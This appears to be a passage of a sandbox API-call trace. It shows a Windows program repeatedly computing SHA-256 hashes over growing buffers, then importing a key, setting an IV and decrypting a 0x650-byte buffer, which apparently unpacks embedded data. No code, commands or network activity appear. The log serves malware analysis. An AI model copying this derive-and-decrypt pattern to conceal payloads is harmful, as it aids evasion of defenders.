	[0102.174] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.175] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.175] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0102.175] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247ca0
	[0102.175] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247ca0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247ca0, pdwDataLen=0x12941c) returned 1
	[0102.175] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.175] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.175] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.175] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.175] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0102.175] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247cc8
	[0102.175] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247cc8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247cc8, pdwDataLen=0x12941c) returned 1
	[0102.175] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.175] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.176] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.176] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.176] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0102.176] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247cf0
	[0102.176] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247cf0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247cf0, pdwDataLen=0x12941c) returned 1
	[0102.176] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.176] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.176] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.176] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.176] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0102.177] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.177] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247d18
	[0102.177] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247d18, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247d18, pdwDataLen=0x12941c) returned 1
	[0102.177] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.177] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.177] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.177] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.177] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0102.177] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.177] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247d40
	[0102.177] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247d40, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247d40, pdwDataLen=0x12941c) returned 1
	[0102.177] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.177] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.177] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.178] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.178] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0102.178] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.178] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247d68
	[0102.178] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247d68, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247d68, pdwDataLen=0x12941c) returned 1
	[0102.178] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.178] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.178] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.178] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.178] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0102.178] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.178] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247d90
	[0102.178] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247d90, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247d90, pdwDataLen=0x12941c) returned 1
	[0102.178] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.178] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.178] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.179] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.179] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0102.179] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247db8
	[0102.179] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247db8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247db8, pdwDataLen=0x12941c) returned 1
	[0102.179] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.179] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.179] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.179] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.179] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0102.179] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247de0
	[0102.179] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247de0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247de0, pdwDataLen=0x12941c) returned 1
	[0102.179] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.179] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.179] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.180] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.180] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0102.180] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.180] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247e08
	[0102.180] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247e08, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247e08, pdwDataLen=0x12941c) returned 1
	[0102.180] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.180] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.180] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.180] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.181] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0102.181] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.181] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247e30
	[0102.181] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247e30, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247e30, pdwDataLen=0x12941c) returned 1
	[0102.181] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.181] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.181] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.181] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.181] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0102.181] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.181] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247e58
	[0102.181] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247e58, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247e58, pdwDataLen=0x12941c) returned 1
	[0102.181] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.181] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.181] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.182] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.182] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0102.182] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.182] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247e80
	[0102.182] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247e80, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247e80, pdwDataLen=0x12941c) returned 1
	[0102.182] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.182] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.182] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.182] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.182] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0102.182] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.182] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247ea8
	[0102.182] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247ea8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247ea8, pdwDataLen=0x12941c) returned 1
	[0102.182] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.182] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.182] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.183] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.183] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0102.183] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.183] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247ed0
	[0102.183] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247ed0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247ed0, pdwDataLen=0x12941c) returned 1
	[0102.183] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.183] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.183] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.183] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.183] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0102.183] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.183] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247ef8
	[0102.183] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247ef8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247ef8, pdwDataLen=0x12941c) returned 1
	[0102.184] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.184] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.184] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.184] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.184] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0102.184] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.184] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247f20
	[0102.184] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247f20, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247f20, pdwDataLen=0x12941c) returned 1
	[0102.184] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.184] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.184] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.184] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.185] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0102.185] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.185] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247f48
	[0102.185] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247f48, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247f48, pdwDataLen=0x12941c) returned 1
	[0102.185] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.185] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.185] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.185] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.185] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0102.185] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.185] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247f70
	[0102.185] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247f70, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247f70, pdwDataLen=0x12941c) returned 1
	[0102.185] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.185] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.185] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.186] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.186] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0102.186] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.186] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247f98
	[0102.186] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247f98, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247f98, pdwDataLen=0x12941c) returned 1
	[0102.186] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.186] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.186] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.186] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.186] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0102.186] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.186] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247fc0
	[0102.186] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247fc0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247fc0, pdwDataLen=0x12941c) returned 1
	[0102.186] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.186] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.186] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.187] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.187] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0102.187] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247fe8
	[0102.187] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247fe8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247fe8, pdwDataLen=0x12941c) returned 1
	[0102.187] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.187] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.187] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.187] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.187] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0102.187] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x248010
	[0102.187] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x248010, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x248010, pdwDataLen=0x12941c) returned 1
	[0102.187] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.187] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.187] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.188] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.188] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0102.188] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.188] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x248038
	[0102.188] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x248038, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x248038, pdwDataLen=0x12941c) returned 1
	[0102.188] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.188] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.188] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.188] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.188] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0102.188] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.188] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x248060
	[0102.189] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x248060, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x248060, pdwDataLen=0x12941c) returned 1
	[0102.189] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.189] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.189] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x244988) returned 1
	[0102.189] CryptAcquireContextW (in: phProv=0x129448, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129448*=0x249f18) returned 1
	[0102.189] CryptImportKey (in: hProv=0x249f18, pbData=0x129410, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x129450 | out: phKey=0x129450*=0x213ab0) returned 1
	[0102.189] CryptSetKeyParam (hKey=0x213ab0, dwParam=0x4, pbData=0x12943c*=0x1, dwFlags=0x0) returned 1
	[0102.189] CryptSetKeyParam (hKey=0x213ab0, dwParam=0x1, pbData=0x248060, dwFlags=0x0) returned 1
	[0102.189] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x650) returned 0x244988
	[0102.189] CryptDecrypt (in: hKey=0x213ab0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x244988, pdwDataLen=0x129444 | out: pbData=0x244988, pdwDataLen=0x129444) returned 1
	[0102.190] CryptDestroyKey (hKey=0x213ab0) returned 1
	[0102.190] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.190] GetVersion () returned 0x1db10106
